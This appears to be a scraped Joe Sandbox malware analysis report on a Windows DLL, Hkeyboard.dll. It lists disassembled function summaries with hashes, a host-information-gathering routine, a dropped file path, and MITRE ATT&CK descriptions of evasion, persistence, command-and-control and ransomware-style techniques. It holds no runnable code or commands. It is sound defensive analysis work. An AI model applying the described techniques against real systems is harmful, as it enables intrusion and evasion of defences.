Source File: 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp, Offset: 04160000, based on PE: true

Associated: 0000000B.00000002.2296201390.00000000041A2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2296201390.00000000041A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2296201390.00000000041AA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4160000_rundll32.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: csm
API String ID: 803148776-1018135373
Opcode ID: 49aad3047015f2739b208b480d3e3ac4fdd781021d16e8741db6a09c693378ed
Instruction ID: dc3b6ca88464517979e6e06ee1400a353fdb8ab9f513669b03acabe9ca82f91b
Opcode Fuzzy Hash: 49aad3047015f2739b208b480d3e3ac4fdd781021d16e8741db6a09c693378ed
Instruction Fuzzy Hash: 34014B38901206ABEF34EF64C4C86ADB7F6AF01311F6C48ADD445A66A0CB31ADC1DF41

Function 04172945 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0417242A: __getptd.LIBCMT ref: 04172430
Part of subcall function 0417242A: __getptd.LIBCMT ref: 04172440

__getptd.LIBCMT ref: 04172954

Part of subcall function 04164838: __getptd_noexit.LIBCMT ref: 0416483B
Part of subcall function 04164838: __amsg_exit.LIBCMT ref: 04164848

__getptd.LIBCMT ref: 04172962

Strings

csm, xrefs: 04172970

Memory Dump Source

Source File: 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp, Offset: 04160000, based on PE: true

Associated: 0000000B.00000002.2296201390.00000000041A2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2296201390.00000000041A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2296201390.00000000041AA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4160000_rundll32.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: csm
API String ID: 803148776-1018135373
Opcode ID: 9ff1a4ed38afa8f1ce8c2507374a21226cc69ae74f6227c2680dd2dd3e743e4e
Instruction ID: c685cf88fd16c2b87920e712db83522f1eb458ff494ec6b8bbff523f688c4b07
Opcode Fuzzy Hash: 9ff1a4ed38afa8f1ce8c2507374a21226cc69ae74f6227c2680dd2dd3e743e4e
Instruction Fuzzy Hash: 8E016D35800215CADF369F61E4C07ADB7B6BF00211F9844EED88A96651CB30E593CB41

Function 04173F80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28networkCOMMON

Download Yara Rule

APIs

Part of subcall function 04175140: _memset.LIBCMT ref: 0417515F
Part of subcall function 04175140: _memset.LIBCMT ref: 04175179
Part of subcall function 04175140: GetComputerNameA.KERNEL32(00000000,?), ref: 04175199
Part of subcall function 04175140: lstrcpyA.KERNEL32(00000000,UnKnow), ref: 041751AF
Part of subcall function 04175140: _memset.LIBCMT ref: 041751C3
Part of subcall function 04175140: wsprintfA.USER32 ref: 041751DB

gethostname.WS2_32(?,00000032), ref: 04173FA3
_strncpy.LIBCMT ref: 04173FAF

Strings

Remark, xrefs: 04173F85

Memory Dump Source

Source File: 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp, Offset: 04160000, based on PE: true

Associated: 0000000B.00000002.2296201390.00000000041A2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2296201390.00000000041A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2296201390.00000000041AA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4160000_rundll32.jbxd

Similarity

API ID: _memset$ComputerName_strncpygethostnamelstrcpywsprintf
String ID: Remark
API String ID: 3464725772-3865500943
Opcode ID: 7714560e256ef32715f851c3273dc7281359c03dae87c11c0c9a0392e7cc3348
Instruction ID: 967be8e81c2910f374d4b97b61e62d72a0ce190bd5f34208fe2cd45509060371
Opcode Fuzzy Hash: 7714560e256ef32715f851c3273dc7281359c03dae87c11c0c9a0392e7cc3348
Instruction Fuzzy Hash: 1AE0CD2694811C2BAB153965ACD98B77B3DCB435ADB0002DDFD0D97601EF073D1A92D3

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: `rundll32.exe {DLLname, DLLfunction}` ).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete or modify artifacts generated within systems to remove evidence of their presence or hinder defenses. Various artifacts may be created by an adversary or something that can be attributed to an adversary’s actions. Typically these artifacts are used as defensive indicators related to monitored events, such as strings from downloaded files, logs that are generated from user actions, and other data analyzed by defenders. Location, format, and type of artifact (such as command or login history) are often specific to each platform.
Tactics:	Defense Evasion
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Deletion, File: File Metadata, File: File Modification, Firewall: Firewall Rule Modification, Network Traffic: Network Traffic Content, Process: OS API Execution, Process: Process Creation, Scheduled Job: Scheduled Job Modification, User Account: User Account Authentication, User Account: User Account Deletion, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, Google Workspace, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit remote services to gain unauthorized access to internal systems once inside of a network. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system.
Tactics:	Lateral Movement
Data Sources:	Application Log: Application Log Content, Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Hkeyboard.dll

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Exploits

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\krngSwkI6jAYZzGZe.dat

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Exports

Possible Origin

Windows Analysis Report
Hkeyboard.dll

Function 04EC48A0 Relevance: 51.0, APIs: 19, Strings: 10, Instructions: 208
stringsynchronizationCOMMONLIBRARYCODE

Function 04EC4D60 Relevance: 40.4, APIs: 15, Strings: 8, Instructions: 197
libraryloaderregistryCOMMONLIBRARYCODE

Function 6D01BDE0 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 194
networkCOMMON

Function 04EB2000 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 73
threadprocessmemoryCOMMON

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.
Tactics:	Impact
Data Sources:	Cloud Storage: Cloud Storage Modification, Command: Command Execution, File: File Creation, File: File Modification, Network Share: Network Share Access, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre